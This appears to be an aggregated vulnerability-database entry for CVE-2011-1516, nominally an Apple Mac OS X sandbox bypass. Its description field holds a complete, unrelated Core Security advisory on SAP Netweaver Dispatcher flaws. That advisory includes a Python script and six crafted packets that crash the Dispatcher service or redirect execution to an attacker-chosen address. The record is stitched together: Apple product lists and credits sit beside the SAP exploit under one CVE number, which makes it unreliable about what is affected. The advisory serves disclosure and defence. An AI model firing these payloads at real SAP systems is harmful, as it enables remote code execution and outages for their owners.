ID

VAR-201111-0111


CVE

CVE-2011-1516


TITLE

Apple Mac OS X Network resource access vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2011-003010

DESCRIPTION

The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303. An attacker can exploit this issue to bypass certain security restrictions and gain access to restricted functionality. Apple Mac OS X 10.5.x, 10.6.x and 10.7.x are vulnerable; other versions may also be affected. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SAP Netweaver Dispatcher Multiple Vulnerabilities 1. *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the "Dispatcher" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the "Dispatcher" service. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability* [CVE-2011-1517] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability* [CVE-2012-2511] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceAtoms'. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability* [CVE-2012-2512] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceStreamI' and could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability* [CVE-2012-2513] The vulnerability can be triggered by the vulnerable function 'Diaginput', allowing a denial of service attack against the vulnerable systems. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability* [CVE-2012-2514] The vulnerability can be triggered by the vulnerable function 'DiagiEventSource' in the 'disp+work.exe' module. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Trust: 2.16

sources: NVD: CVE-2011-1516 // JVNDB: JVNDB-2011-003010 // BID: 50644 // VULHUB: VHN-49461 // VULMON: CVE-2011-1516 // PACKETSTORM: 112538

AFFECTED PRODUCTS

vendor:applemodel:mac os xscope:eqversion:10.5.4

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.7.1

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.7.2

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.6.8

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.5.2

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.5.0

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.5.1

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.7.0

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.5.3

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.6.7

Trust: 1.6

vendor:applemodel:mac os xscope:eqversion:10.5.7

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.6.3

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.6.6

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.6.1

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.6.4

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.6.5

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.5.8

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.6.0

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.6.2

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.5.5

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.5.6

Trust: 1.0

vendor:applemodel:mac os xscope:eqversion:10.5.x to 10.7.x

Trust: 0.8

vendor:applemodel:mac osscope:eqversion:x10.6

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.7

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.6

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.6

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.3

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.7.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.8

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.5

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.4

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.2

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.7

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.7

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.2

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.5.1

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.8

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.5

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.7.2

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.4

Trust: 0.3

vendor:applemodel:mac osscope:eqversion:x10.6.3

Trust: 0.3

sources: BID: 50644 // JVNDB: JVNDB-2011-003010 // CNNVD: CNNVD-201111-271 // NVD: CVE-2011-1516

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2011-1516
value: HIGH

Trust: 1.0

NVD: CVE-2011-1516
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201111-271
value: HIGH

Trust: 0.6

VULHUB: VHN-49461
value: HIGH

Trust: 0.1

VULMON: CVE-2011-1516
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2011-1516
severity: HIGH
baseScore: 7.6
vectorString: AV:N/AC:H/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 4.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

VULHUB: VHN-49461
severity: HIGH
baseScore: 7.6
vectorString: AV:N/AC:H/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 4.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-49461 // VULMON: CVE-2011-1516 // JVNDB: JVNDB-2011-003010 // CNNVD: CNNVD-201111-271 // NVD: CVE-2011-1516

PROBLEMTYPE DATA

problemtype:CWE-264

Trust: 1.9

sources: VULHUB: VHN-49461 // JVNDB: JVNDB-2011-003010 // NVD: CVE-2011-1516

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 112538 // CNNVD: CNNVD-201111-271

TYPE

permissions and access control

Trust: 0.6

sources: CNNVD: CNNVD-201111-271

CONFIGURATIONS

sources: JVNDB: JVNDB-2011-003010

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-49461 // VULMON: CVE-2011-1516

PATCH

title:Top Pageurl:http://www.apple.com/

Trust: 0.8

title:MacOSXUpd10.7.1url:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=41794

Trust: 0.6

sources: JVNDB: JVNDB-2011-003010 // CNNVD: CNNVD-201111-271

EXTERNAL IDS

db:NVDid:CVE-2011-1516

Trust: 3.0

db:BIDid:50644

Trust: 1.1

db:JVNDBid:JVNDB-2011-003010

Trust: 0.8

db:CNNVDid:CNNVD-201111-271

Trust: 0.7

db:PACKETSTORMid:112538

Trust: 0.3

db:EXPLOIT-DBid:18853

Trust: 0.2

db:SEEBUGid:SSVID-72871

Trust: 0.1

db:PACKETSTORMid:106850

Trust: 0.1

db:VULHUBid:VHN-49461

Trust: 0.1

db:VULMONid:CVE-2011-1516

Trust: 0.1

sources: VULHUB: VHN-49461 // VULMON: CVE-2011-1516 // BID: 50644 // JVNDB: JVNDB-2011-003010 // PACKETSTORM: 112538 // CNNVD: CNNVD-201111-271 // NVD: CVE-2011-1516

REFERENCES

url:http://www.coresecurity.com/content/apple-osx-sandbox-bypass

Trust: 2.1

url:http://www.securityfocus.com/archive/1/520479/100/100/threaded

Trust: 1.2

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1516

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-1516

Trust: 0.8

url:http://www.securityfocus.com/bid/50644

Trust: 0.7

url:http://www.apple.com/macosx/

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/264.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://packetstormsecurity.com/files/112538/sap-netweaver-7.0-ehp1-ehp2-buffer-overflows.html

Trust: 0.1

url:https://www.exploit-db.com/exploits/18853/

Trust: 0.1

url:https://service.sap.com/sap/support/notes/1687910

Trust: 0.1

url:http://corelabs.coresecurity.com/

Trust: 0.1

url:http://www.coresecurity.com/content/services-overview-core-security-consulting-services.

Trust: 0.1

url:http://www.coresecurity.com.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2012-2511

Trust: 0.1

url:http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities

Trust: 0.1

url:http://www.sap.com/platform/netweaver/index.epx

Trust: 0.1

url:http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2011-1516

Trust: 0.1

url:http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Trust: 0.1

url:http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2011-1517

Trust: 0.1

url:http://corelabs.coresecurity.com.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2012-2513

Trust: 0.1

url:http://www.coresecurity.com/content/corelabs-advisories

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2012-2514

Trust: 0.1

url:https://service.sap.com/sap/support/notes/1687910.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2012-2512

Trust: 0.1

url:http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.

Trust: 0.1

sources: VULHUB: VHN-49461 // VULMON: CVE-2011-1516 // BID: 50644 // JVNDB: JVNDB-2011-003010 // PACKETSTORM: 112538 // CNNVD: CNNVD-201111-271 // NVD: CVE-2011-1516

CREDITS

Anibal Sacco and Matias Eissler from Core Security Technologies.

Trust: 0.9

sources: BID: 50644 // CNNVD: CNNVD-201111-271

SOURCES

db:VULHUBid:VHN-49461
db:VULMONid:CVE-2011-1516
db:BIDid:50644
db:JVNDBid:JVNDB-2011-003010
db:PACKETSTORMid:112538
db:CNNVDid:CNNVD-201111-271
db:NVDid:CVE-2011-1516

LAST UPDATE DATE

2024-08-14T13:58:38.556000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-49461date:2018-10-09T00:00:00
db:VULMONid:CVE-2011-1516date:2018-10-09T00:00:00
db:BIDid:50644date:2011-11-10T00:00:00
db:JVNDBid:JVNDB-2011-003010date:2011-11-24T00:00:00
db:CNNVDid:CNNVD-201111-271date:2011-11-16T00:00:00
db:NVDid:CVE-2011-1516date:2018-10-09T19:31:06.410

SOURCES RELEASE DATE

db:VULHUBid:VHN-49461date:2011-11-15T00:00:00
db:VULMONid:CVE-2011-1516date:2011-11-15T00:00:00
db:BIDid:50644date:2011-11-10T00:00:00
db:JVNDBid:JVNDB-2011-003010date:2011-11-24T00:00:00
db:PACKETSTORMid:112538date:2012-05-08T15:15:15
db:CNNVDid:CNNVD-201111-271date:1900-01-01T00:00:00
db:NVDid:CVE-2011-1516date:2011-11-15T18:55:01.637